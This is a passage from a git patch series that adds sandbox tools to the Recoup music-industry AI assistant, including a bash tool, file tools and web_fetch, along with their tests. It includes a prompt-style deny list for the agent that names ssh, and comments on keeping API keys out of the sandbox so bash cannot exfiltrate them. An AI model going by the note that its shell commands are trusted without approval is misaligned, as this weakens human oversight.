+    expect(sandbox.execDetached.mock.calls[0]).toHaveLength(2);
+  });
+});
diff --git a/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts b/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts
new file mode 100644
index 000000000..3422fd662
--- /dev/null
+++ b/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts
@@ -0,0 +1,31 @@
+import { describe, it, expect } from "vitest";
+import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv";
+
+const baseSandbox = { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" };
+
+describe("buildRecoupExecEnv", () => {
+  it("returns undefined when no context", () => {
+    expect(buildRecoupExecEnv(undefined)).toBeUndefined();
+    expect(buildRecoupExecEnv(null)).toBeUndefined();
+    expect(buildRecoupExecEnv("not-a-context")).toBeUndefined();
+  });
+
+  it("returns undefined when context has no recoupOrgId", () => {
+    expect(buildRecoupExecEnv({ sandbox: baseSandbox })).toBeUndefined();
+  });
+
+  it("injects RECOUP_ORG_ID when present in context", () => {
+    const env = buildRecoupExecEnv({ sandbox: baseSandbox, recoupOrgId: "org-uuid" });
+    expect(env).toEqual({ RECOUP_ORG_ID: "org-uuid" });
+  });
+
+  it("ignores empty-string recoupOrgId", () => {
+    const env = buildRecoupExecEnv({ sandbox: baseSandbox, recoupOrgId: "" });
+    expect(env).toBeUndefined();
+  });
+
+  it("returns undefined when the input is not a valid AgentContext shape", () => {
+    expect(buildRecoupExecEnv({ recoupOrgId: "org-uuid" })).toBeUndefined();
+    expect(buildRecoupExecEnv({ sandbox: null, recoupOrgId: "org-uuid" })).toBeUndefined();
+  });
+});
diff --git a/lib/agent/tools/__tests__/getSandbox.test.ts b/lib/agent/tools/__tests__/getSandbox.test.ts
new file mode 100644
index 000000000..a14122f81
--- /dev/null
+++ b/lib/agent/tools/__tests__/getSandbox.test.ts
@@ -0,0 +1,39 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("getSandbox", () => {
+  it("reconnects via connectVercel(state) and returns the sandbox", async () => {
+    const fakeSandbox = { workingDirectory: "/sandbox/mono" };
+    vi.mocked(connectVercel).mockResolvedValue(fakeSandbox as never);
+    const state = { sandboxName: "session-xyz" };
+    const result = await getSandbox(
+      { sandbox: { state, workingDirectory: "/sandbox/mono" } },
+      "bash",
+    );
+    expect(result).toBe(fakeSandbox);
+    expect(connectVercel).toHaveBeenCalledWith(state);
+  });
+
+  it("throws a descriptive error when context is missing entirely", async () => {
+    await expect(getSandbox(undefined, "bash")).rejects.toThrow(/Sandbox state missing/);
+  });
+
+  it("throws when sandbox.state is missing", async () => {
+    await expect(
+      getSandbox({ sandbox: { workingDirectory: "/x" } } as never, "bash"),
+    ).rejects.toThrow(/Sandbox state missing/);
+  });
+
+  it("throws when sandbox.workingDirectory is empty (tightened guard)", async () => {
+    await expect(
+      getSandbox({ sandbox: { state: {}, workingDirectory: "" } } as never, "bash"),
+    ).rejects.toThrow(/Sandbox state missing/);
+  });
+});
diff --git a/lib/agent/tools/__tests__/isAgentContext.test.ts b/lib/agent/tools/__tests__/isAgentContext.test.ts
new file mode 100644
index 000000000..29ad4f29d
--- /dev/null
+++ b/lib/agent/tools/__tests__/isAgentContext.test.ts
@@ -0,0 +1,42 @@
+import { describe, it, expect } from "vitest";
+import { isAgentContext } from "@/lib/agent/tools/isAgentContext";
+
+describe("isAgentContext", () => {
+  it("returns true for a well-formed context", () => {
+    expect(
+      isAgentContext({
+        sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" },
+      }),
+    ).toBe(true);
+  });
+
+  it("returns false for non-object inputs", () => {
+    expect(isAgentContext(undefined)).toBe(false);
+    expect(isAgentContext(null)).toBe(false);
+    expect(isAgentContext("nope")).toBe(false);
+    expect(isAgentContext(42)).toBe(false);
+  });
+
+  it("returns false when sandbox is missing", () => {
+    expect(isAgentContext({})).toBe(false);
+  });
+
+  it("returns false when sandbox is null", () => {
+    expect(isAgentContext({ sandbox: null })).toBe(false);
+  });
+
+  it("returns false when sandbox is empty (missing state and workingDirectory)", () => {
+    expect(isAgentContext({ sandbox: {} })).toBe(false);
+  });
+
+  it("returns false when sandbox.state is missing or null", () => {
+    expect(isAgentContext({ sandbox: { workingDirectory: "/x" } })).toBe(false);
+    expect(isAgentContext({ sandbox: { state: null, workingDirectory: "/x" } })).toBe(false);
+  });
+
+  it("returns false when sandbox.workingDirectory is missing, non-string, or empty", () => {
+    expect(isAgentContext({ sandbox: { state: {} } })).toBe(false);
+    expect(isAgentContext({ sandbox: { state: {}, workingDirectory: 42 } })).toBe(false);
+    expect(isAgentContext({ sandbox: { state: {}, workingDirectory: "" } })).toBe(false);
+  });
+});
diff --git a/lib/agent/tools/bashTool.ts b/lib/agent/tools/bashTool.ts
new file mode 100644
index 000000000..908113812
--- /dev/null
+++ b/lib/agent/tools/bashTool.ts
@@ -0,0 +1,116 @@
+import { tool } from "ai";
+import { z } from "zod";
+import * as path from "path";
+import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+
+const TIMEOUT_MS = 120_000;
+
+const bashInputSchema = z.object({
+  command: z.string().describe("The bash command to execute"),
+  cwd: z
+    .string()
+    .optional()
+    .describe("Workspace-relative working directory for the command (e.g., apps/web)"),
+  detached: z
+    .boolean()
+    .optional()
+    .describe(
+      "Use this whenever you want to run a persistent server in the background (e.g., npm run dev, next dev). The command starts and returns immediately without waiting for it to finish.",
+    ),
+});
+
+/**
+ * Factory for the `bash` sandbox tool. Runs `bash -c "<command>"` inside
+ * the agent's sandbox via `sandbox.exec`, defaulting cwd to the sandbox's
+ * working directory.
+ *
+ * Approval gating is intentionally absent — model-issued commands are
+ * trusted in this PR. Add a host-side gate at the route/UI layer if that
+ * changes.
+ *
+ * Foreground execs receive `RECOUP_ORG_ID` from agent context (when the
+ * sandbox is org-scoped) so future `recoup-api` skill calls can scope to
+ * the right org. Detached execs deliberately skip env injection — those
+ * processes outlive the prompt.
+ */
+export const bashTool = () =>
+  tool({
+    description: `Execute a bash command in the user's shell (non-interactive).
+
+WHEN TO USE:
+- Running existing project commands (build, test, lint, typecheck)
+- Using read-only CLI tools (git status, git diff, ls, etc.)
+- Invoking language/package managers (npm, pnpm, yarn, pip, go, etc.) as part of the task
+
+WHEN NOT TO USE:
+- Reading files (use the file read tool instead, once available)
+- Editing or creating files (use file edit/write tools, once available)
+- Searching code or text (use grep / glob tools, once available)
+- Interactive commands (shells, editors, REPLs)
+
+USAGE:
+- Runs bash -c "<command>" in a non-interactive shell (no TTY/PTY)
+- Commands run in the sandbox working directory by default — do NOT prepend "cd /path &&"
+- Use the cwd parameter ONLY with a workspace-relative subdirectory
+- Commands automatically timeout after ~2 minutes
+- Combined stdout/stderr output is truncated after ~50,000 characters
+
+IMPORTANT:
+- Never chain commands with ';' or '&&' — use separate tool calls
+- Never use interactive commands (vim, nano, top, bash, ssh, etc.)
+- Always quote file paths that may contain spaces
+- Use detached: true to start dev servers / long-running processes in the background`,
+    inputSchema: bashInputSchema,
+    execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => {
+      const sandbox = await getSandbox(experimental_context, "bash");
+      const workingDirectory = sandbox.workingDirectory;
+      const workingDir = cwd
+        ? path.isAbsolute(cwd)
+          ? cwd
+          : path.resolve(workingDirectory, cwd)
+        : workingDirectory;
+
+      if (detached) {
+        if (!sandbox.execDetached) {
+          return {
+            success: false,
+            exitCode: null,
+            stdout: "",
+            stderr:
+              "Detached mode is not supported in this sandbox environment. Only cloud sandboxes support background processes.",
+          };
+        }
+        try {
+          const { commandId } = await sandbox.execDetached(command, workingDir);
+          return {
+            success: true,
+            exitCode: null,
+            stdout: `Process started in background (command ID: ${commandId}). The server is now running.`,
+            stderr: "",
+          };
+        } catch (error) {
+          return {
+            success: false,
+            exitCode: null,
+            stdout: "",
+            stderr: error instanceof Error ? error.message : String(error),
+          };
+        }
+      }
+
+      const recoupEnv = buildRecoupExecEnv(experimental_context);
+      const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, {
+        signal: abortSignal,
+        ...(recoupEnv ? { env: recoupEnv } : {}),
+      });
+
+      return {
+        success: result.success,
+        exitCode: result.exitCode,
+        stdout: result.stdout,
+        stderr: result.stderr,
+        ...(result.truncated && { truncated: true }),
+      };
+    },
+  });
diff --git a/lib/agent/tools/buildRecoupExecEnv.ts b/lib/agent/tools/buildRecoupExecEnv.ts
new file mode 100644
index 000000000..6eaf3015f
--- /dev/null
+++ b/lib/agent/tools/buildRecoupExecEnv.ts
@@ -0,0 +1,30 @@
+import { isAgentContext } from "@/lib/agent/tools/isAgentContext";
+
+/**
+ * Build a per-invocation env override carrying Recoupable sandbox context
+ * so outbound shell commands (curl, scripts, the `recoup-api` skill) can
+ * scope requests correctly without any state persisting on the sandbox.
+ *
+ * Currently injects only `RECOUP_ORG_ID` — a public identifier. Auth-token
+ * injection is deliberately NOT included here; a long-lived api key in the
+ * sandbox env would be readable by any model-issued bash command. Proper
+ * short-lived token minting will land alongside the `skill` tool port
+ * (when there's an actual consumer for it).
+ *
+ * Returns `undefined` when nothing is available to inject so callers can
+ * cleanly spread a conditional `...(env ? { env } : {})` into exec opts.
+ *
+ * @param experimental_context - The opaque context object passed by AI SDK to tool execute.
+ */
+export function buildRecoupExecEnv(
+  experimental_context: unknown,
+): Record<string, string> | undefined {
+  if (!isAgentContext(experimental_context)) return undefined;
+
+  const env: Record<string, string> = {};
+  // isAgentContext only vets `sandbox`; never forward a non-string org id into env.
+  const orgId: unknown = experimental_context.recoupOrgId;
+  if (typeof orgId === "string" && orgId.length > 0) env.RECOUP_ORG_ID = orgId;
+
+  return Object.keys(env).length > 0 ? env : undefined;
+}
diff --git a/lib/agent/tools/getSandbox.ts b/lib/agent/tools/getSandbox.ts
new file mode 100644
index 000000000..be6c46605
--- /dev/null
+++ b/lib/agent/tools/getSandbox.ts
@@ -0,0 +1,28 @@
+import type { Sandbox } from "@/lib/sandbox/interface";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+import { isAgentContext } from "@/lib/agent/tools/isAgentContext";
+
+/**
+ * Resolve a connected `Sandbox` from `experimental_context`. Reconnects on each
+ * call via `connectVercel(state)` instead of caching the handle on context:
+ * workflow durability requires re-acquiring sandbox sessions inside each step.
+ *
+ * @param experimental_context - The opaque context object passed by AI SDK to tool execute.
+ * @param toolName - Optional tool name to surface in error messages.
+ * @returns The `Sandbox` resolved by `connectVercel` for `sandbox.state`.
+ * @throws Error if `experimental_context` does not pass `isAgentContext`.
+ */
+export async function getSandbox(
+  experimental_context: unknown,
+  toolName?: string,
+): Promise<Sandbox> {
+  if (!isAgentContext(experimental_context)) {
+    const where = toolName ? ` (tool: ${toolName})` : "";
+    throw new Error(
+      `Sandbox state missing from agent context${where}. ` +
+        "Ensure the workflow start payload includes `sandbox.state` and that " +
+        "runAgentStep threads it via experimental_context.",
+    );
+  }
+  return connectVercel(experimental_context.sandbox.state);
+}
diff --git a/lib/agent/tools/isAgentContext.ts b/lib/agent/tools/isAgentContext.ts
new file mode 100644
index 000000000..0049ac010
--- /dev/null
+++ b/lib/agent/tools/isAgentContext.ts
@@ -0,0 +1,26 @@
+import type { AgentContext } from "@/lib/agent/tools/AgentContext";
+
+/**
+ * Type-guard confirming an arbitrary `experimental_context` value has the
+ * required AgentContext leaves: a non-null `sandbox` object, a non-null
+ * `sandbox.state` object and a non-empty string `sandbox.workingDirectory`.
+ * Earlier weaker guards accepted `{ sandbox: null }` or `{ sandbox: {} }`,
+ * letting tools crash later. Optional fields (e.g. `recoupOrgId`) are NOT validated here.
+ *
+ * @param value - The opaque context object passed by AI SDK to tool execute.
+ * @returns `true` only when all three required leaves are present.
+ */
+export function isAgentContext(value: unknown): value is AgentContext {
+  if (typeof value !== "object" || value === null) return false;
+
+  const candidate = value as { sandbox?: unknown };
+  const sandbox = candidate.sandbox;
+  if (typeof sandbox !== "object" || sandbox === null) return false;
+
+  const sandboxFields = sandbox as { state?: unknown; workingDirectory?: unknown };
+  if (typeof sandboxFields.state !== "object" || sandboxFields.state === null) return false;
+  if (typeof sandboxFields.workingDirectory !== "string") return false;
+  if (sandboxFields.workingDirectory.length === 0) return false;
+
+  return true;
+}
diff --git a/lib/agents/generalAgent/getGeneralAgent.ts b/lib/agents/generalAgent/getGeneralAgent.ts
index 7c2c9407b..e4bc4fc56 100644
--- a/lib/agents/generalAgent/getGeneralAgent.ts
+++ b/lib/agents/generalAgent/getGeneralAgent.ts
@@ -1,4 +1,5 @@
-import { stepCountIs, ToolLoopAgent } from "ai";
+import { ToolLoopAgent } from "ai";
+import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const";
 import { AnthropicProviderOptions } from "@ai-sdk/anthropic";
 import { GoogleGenerativeAIProviderOptions } from "@ai-sdk/google";
 import { OpenAIResponsesProviderOptions } from "@ai-sdk/openai";
@@ -52,7 +53,7 @@ export default async function getGeneralAgent(body: ChatRequestBody): Promise<Ro
 
   const tools = await setupToolsForRequest(body);
   const model = bodyModel || DEFAULT_MODEL;
-  const stopWhen = stepCountIs(111);
+  const stopWhen = CHAT_AGENT_STOP_WHEN;
 
   const agent = new ToolLoopAgent({
     model,
diff --git a/lib/chat/const.ts b/lib/chat/const.ts
index 0ff8cbd2b..54daa63d4 100644
--- a/lib/chat/const.ts
+++ b/lib/chat/const.ts
@@ -1,5 +1,18 @@
+import { stepCountIs } from "ai";
+
 export const MAX_MESSAGES = 55;
 
+/**
+ * Stop condition for multi-step chat agent loops (model → tool → model → …).
+ * Used by /api/chat (via getGeneralAgent) and /api/chat/workflow (via
+ * runAgentStep). 111 is high enough that normal flows never hit the cap
+ * but bounds runaway loops for cost / replay safety.
+ *
+ * Single-shot agents (compact, content, email-reply) use `stepCountIs(1)`
+ * directly — they're not in the multi-step family.
+ */
+export const CHAT_AGENT_STOP_WHEN = stepCountIs(111);
+
 export const SYSTEM_PROMPT = `You are Recoup, a friendly, sharp, and strategic AI assistant for the music industry. You help music executives, artist teams, and self-starting artists analyze fan data, optimize marketing, and grow artist careers.
 
 ---
diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts
index dcaad8585..6ceb0c867 100644
--- a/lib/chat/handleChatWorkflowStream.ts
+++ b/lib/chat/handleChatWorkflowStream.ts
@@ -13,6 +13,9 @@ import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage";
 import { errorResponse } from "@/lib/networking/errorResponse";
 import { getCorsHeaders } from "@/lib/networking/getCorsHeaders";
 import { runAgentWorkflow } from "@/app/lib/workflows/runAgentWorkflow";
+import { extractOrgId } from "@/lib/recoupable/extractOrgId";
+import { DEFAULT_WORKING_DIRECTORY } from "@/lib/sandbox/vercel/sandbox/constants";
+import type { VercelState } from "@/lib/sandbox/vercel/state";
 import generateUUID from "@/lib/uuid/generateUUID";
 
 const DEFAULT_MODEL_ID = "anthropic/claude-haiku-4.5";
@@ -84,12 +87,29 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise<Re
   void persistLatestUserMessage(validated.chatId, validated.messages as never);
 
   const modelId = chat.model_id ?? DEFAULT_MODEL_ID;
+  const recoupOrgId = session.clone_url
+    ? (extractOrgId(session.clone_url) ?? undefined)
+    : undefined;
   const run = await start(runAgentWorkflow, [
     {
       messages: validated.messages,
       chatId: validated.chatId,
       sessionId: validated.sessionId,
       modelId,
+      agentContext: {
+        sandbox: {
+          state: session.sandbox_state as VercelState,
+          // Slim PR 4 ships the default working directory. Per-session
+          // overrides land when createChatRuntime is ported alongside
+          // the rest of the tool surface.
+          workingDirectory: DEFAULT_WORKING_DIRECTORY,
+        },
+        recoupOrgId,
+        // No `recoupAccessToken`: handing the long-lived api key to bash
+        // would let any model-issued command exfiltrate it via env. Proper
+        // short-lived token minting lands alongside the `skill` tool port
+        // (when there's an actual consumer for it).
+      },
     },
   ]);
 

From 51fd649945376a0d0cc4a87a3c172ae91f528d0e Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 13:49:12 -0500
Subject: [PATCH 4/5] =?UTF-8?q?feat(chat-workflow):=20port=207=20leaf=20sa?=
 =?UTF-8?q?ndbox=20tools=20=E2=80=94=20read/write/edit/grep=E2=80=A6=20(#5?=
 =?UTF-8?q?85)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools
from open-agents/packages/agent/tools/. Each is a direct port adapted
to api's Sandbox interface, registered in buildAgentTools, and ready
for the agent to invoke through the existing experimental_context
plumbing.

New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB

New helpers (utilities used by multiple tools):
- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite
tools (`task`, `ask_user_question`, `skill`) need subagent context /
UI rendering / skill discovery infrastructure not in api today and
land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite
3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})`
factories while two (todoWriteTool, webFetchTool) were direct values.
The split was a vestigial copy from open-agents where the factory
pattern only made sense for tools that took options (originally bash's
ToolOptions, which sweetman had me remove in PR 4 review).

AI SDK's `tool()` helper returns a plain value with no per-call state,
so the factory wrappers added nothing. Harmonized to direct-value
exports across all 8 tools:

- bashTool, readFileTool, writeFileTool, editFileTool, grepTool,
  globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: replaced `xTool()` factory calls with direct `xTool` references.

Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 lib/agent/__tests__/buildAgentTools.test.ts   |  34 +++-
 lib/agent/buildAgentTools.ts                  |  29 ++-
 lib/agent/tools/__tests__/bashTool.test.ts    |  14 +-
 .../tools/__tests__/editFileTool.test.ts      |  86 +++++++++
 lib/agent/tools/__tests__/globTool.test.ts    |  97 ++++++++++
 lib/agent/tools/__tests__/grepTool.test.ts    | 103 +++++++++++
 .../tools/__tests__/readFileTool.test.ts      |  89 ++++++++++
 lib/agent/tools/__tests__/shellEscape.test.ts |  20 +++
 .../tools/__tests__/toDisplayPath.test.ts     |  29 +++
 .../tools/__tests__/todoWriteTool.test.ts     |  28 +++
 .../tools/__tests__/webFetchTool.test.ts      |  96 ++++++++++
 .../tools/__tests__/writeFileTool.test.ts     |  52 ++++++
 lib/agent/tools/bashTool.ts                   | 109 ++++++------
 lib/agent/tools/editFileTool.ts               | 100 +++++++++++
 lib/agent/tools/globTool.ts                   | 165 ++++++++++++++++++
 lib/agent/tools/grepTool.ts                   | 143 +++++++++++++++
 lib/agent/tools/readFileTool.ts               |  70 ++++++++
 lib/agent/tools/shellEscape.ts                |  14 ++
 lib/agent/tools/toDisplayPath.ts              |  34 ++++
 lib/agent/tools/todoWriteTool.ts              |  65 +++++++
 lib/agent/tools/webFetchTool.ts               | 124 +++++++++++++
 lib/agent/tools/writeFileTool.ts              |  65 +++++++
 22 files changed, 1491 insertions(+), 75 deletions(-)
 create mode 100644 lib/agent/tools/__tests__/editFileTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/globTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/grepTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/readFileTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/shellEscape.test.ts
 create mode 100644 lib/agent/tools/__tests__/toDisplayPath.test.ts
 create mode 100644 lib/agent/tools/__tests__/todoWriteTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/webFetchTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/writeFileTool.test.ts
 create mode 100644 lib/agent/tools/editFileTool.ts
 create mode 100644 lib/agent/tools/globTool.ts
 create mode 100644 lib/agent/tools/grepTool.ts
 create mode 100644 lib/agent/tools/readFileTool.ts
 create mode 100644 lib/agent/tools/shellEscape.ts
 create mode 100644 lib/agent/tools/toDisplayPath.ts
 create mode 100644 lib/agent/tools/todoWriteTool.ts
 create mode 100644 lib/agent/tools/webFetchTool.ts
 create mode 100644 lib/agent/tools/writeFileTool.ts

diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts
index 52479cad0..5478c59ca 100644
--- a/lib/agent/__tests__/buildAgentTools.test.ts
+++ b/lib/agent/__tests__/buildAgentTools.test.ts
@@ -1,17 +1,35 @@
 import { describe, it, expect } from "vitest";
 import { buildAgentTools } from "@/lib/agent/buildAgentTools";
 
+const EXPECTED_TOOL_NAMES = [
+  "bash",
+  "read",
+  "write",
+  "edit",
+  "grep",
+  "glob",
+  "todo_write",
+  "web_fetch",
+] as const;
+
 describe("buildAgentTools", () => {
-  it("returns a tools record keyed by tool name", () => {
+  it("returns a tools record with all 8 leaf tools registered", () => {
     const tools = buildAgentTools();
-    expect(tools).toHaveProperty("bash");
-    expect(typeof tools.bash).toBe("object");
+    for (const name of EXPECTED_TOOL_NAMES) {
+      expect(tools).toHaveProperty(name);
+    }
   });
 
-  it("each tool has an inputSchema, description, and execute", () => {
-    const tools = buildAgentTools();
-    expect(tools.bash.inputSchema).toBeDefined();
-    expect(tools.bash.description).toBeDefined();
-    expect(typeof tools.bash.execute).toBe("function");
+  it("each tool exposes the AI SDK shape (description + inputSchema + execute)", () => {
+    const tools = buildAgentTools() as Record<
+      string,
+      { description?: unknown; inputSchema?: unknown; execute?: unknown }
+    >;
+    for (const name of EXPECTED_TOOL_NAMES) {
+      const t = tools[name]!;
+      expect(typeof t.description).toBe("string");
+      expect(t.inputSchema).toBeDefined();
+      expect(typeof t.execute).toBe("function");
+    }
   });
 });
diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts
index be6bde085..f9cbc2b39 100644
--- a/lib/agent/buildAgentTools.ts
+++ b/lib/agent/buildAgentTools.ts
@@ -1,4 +1,11 @@
 import { bashTool } from "@/lib/agent/tools/bashTool";
+import { readFileTool } from "@/lib/agent/tools/readFileTool";
+import { writeFileTool } from "@/lib/agent/tools/writeFileTool";
+import { editFileTool } from "@/lib/agent/tools/editFileTool";
+import { grepTool } from "@/lib/agent/tools/grepTool";
+import { globTool } from "@/lib/agent/tools/globTool";
+import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool";
+import { webFetchTool } from "@/lib/agent/tools/webFetchTool";
 
 /**
  * Factory for the full agent tool set passed into `streamText({ tools })`.
@@ -6,14 +13,26 @@ import { bashTool } from "@/lib/agent/tools/bashTool";
  * at execute time — the factory takes no arguments because the tools are
  * stateless modulo that context.
  *
- * Slim PR 4 exposes only `bash`. The remaining sandbox tools (`read`,
- * `write`, `grep`, `glob`, `todo`, `task`, `ask_user_question`, `skill`,
- * `fetch`) port in follow-up PRs and slot into this record one-by-one
- * without changing the factory signature.
+ * Currently ships 8 leaf tools, keyed by the name the model calls them by:
+ *   - bash, read, write, edit, grep, glob (sandbox / file ops)
+ *   - todo_write (planning surface; stateless, echoes the list back)
+ *   - web_fetch (HTTP via curl inside the sandbox)
+ *
+ * Composite tools (`task` subagent, `ask_user_question` UI part,
+ * `skill` skill discovery) will be ported in a follow-up PR — they need
+ * subagent context plumbing / UI rendering / skill discovery infra
+ * that does not exist in this repo yet.
  */
 export function buildAgentTools() {
   return {
-    bash: bashTool(),
+    bash: bashTool,
+    read: readFileTool,
+    write: writeFileTool,
+    edit: editFileTool,
+    grep: grepTool,
+    glob: globTool,
+    todo_write: todoWriteTool,
+    web_fetch: webFetchTool,
   };
 }
 
diff --git a/lib/agent/tools/__tests__/bashTool.test.ts b/lib/agent/tools/__tests__/bashTool.test.ts
index da9a999d3..568a7f72d 100644
--- a/lib/agent/tools/__tests__/bashTool.test.ts
+++ b/lib/agent/tools/__tests__/bashTool.test.ts
@@ -34,7 +34,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     const result = await tool.execute!({ command: "ls" }, {
       experimental_context: baseContext,
     } as never);
@@ -64,7 +64,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     const result = (await tool.execute!({ command: "find ." }, {
       experimental_context: baseContext,
     } as never)) as { truncated?: boolean };
@@ -83,7 +83,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     await tool.execute!({ command: "ls", cwd: "apps/web" }, {
       experimental_context: baseContext,
     } as never);
@@ -107,7 +107,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     await tool.execute!({ command: "curl example.com" }, {
       experimental_context: { ...baseContext, recoupOrgId: "org-uuid" },
     } as never);
@@ -121,7 +121,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     const result = (await tool.execute!({ command: "npm run dev", detached: true }, {
       experimental_context: baseContext,
     } as never)) as { success: boolean; stdout: string };
@@ -134,7 +134,7 @@ describe("bashTool.execute", () => {
     const sandbox = makeSandbox({ execDetached: undefined });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     const result = (await tool.execute!({ command: "npm run dev", detached: true }, {
       experimental_context: baseContext,
     } as never)) as { success: boolean; stderr: string };
@@ -148,7 +148,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     await tool.execute!({ command: "npm run dev", detached: true }, {
       experimental_context: { ...baseContext, recoupOrgId: "org-uuid" },
     } as never);
diff --git a/lib/agent/tools/__tests__/editFileTool.test.ts b/lib/agent/tools/__tests__/editFileTool.test.ts
new file mode 100644
index 000000000..3a2cac81d
--- /dev/null
+++ b/lib/agent/tools/__tests__/editFileTool.test.ts
@@ -0,0 +1,86 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { editFileTool } from "@/lib/agent/tools/editFileTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } };
+
+/**
+ * In-memory sandbox double holding one file: `writeFile` replaces what `readFile` returns.
+ */
+function makeSandbox(initialContent: string) {
+  let fileBody = initialContent;
+  const readFile = vi.fn(async () => fileBody);
+  const writeFile = vi.fn(async (_path: string, next: string) => {
+    fileBody = next;
+  });
+  return { workingDirectory: "/sandbox/mono", readFile, writeFile, getStored: () => fileBody };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("editFileTool", () => {
+  it("replaces a unique oldString once and reports the startLine", async () => {
+    // "old value" sits on line 2 of a three-line file.
+    const sandbox = makeSandbox("line one\nold value\nline three");
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+    const outcome = (await editFileTool.execute!(
+      { filePath: "a.txt", oldString: "old value", newString: "new value" },
+      { experimental_context: ctx } as never,
+    )) as { success: boolean; replacements: number; startLine: number };
+    expect(outcome.success).toBe(true);
+    expect(outcome.replacements).toBe(1);
+    expect(outcome.startLine).toBe(2);
+    expect(sandbox.getStored()).toBe("line one\nnew value\nline three");
+  });
+
+  it("rejects when oldString === newString (no-op)", async () => {
+    const sandbox = makeSandbox("anything");
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+    const outcome = (await editFileTool.execute!(
+      { filePath: "a.txt", oldString: "x", newString: "x" },
+      { experimental_context: ctx } as never,
+    )) as { success: boolean; error: string };
+    expect(outcome.success).toBe(false);
+    expect(outcome.error).toMatch(/must be different/);
+  });
+
+  it("rejects when oldString is not in the file", async () => {
+    // "missing" never occurs in "hello world".
+    const sandbox = makeSandbox("hello world");
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+    const outcome = (await editFileTool.execute!(
+      { filePath: "a.txt", oldString: "missing", newString: "other" },
+      { experimental_context: ctx } as never,
+    )) as { success: boolean; error: string };
+    expect(outcome.success).toBe(false);
+    expect(outcome.error).toMatch(/not found/);
+  });
+
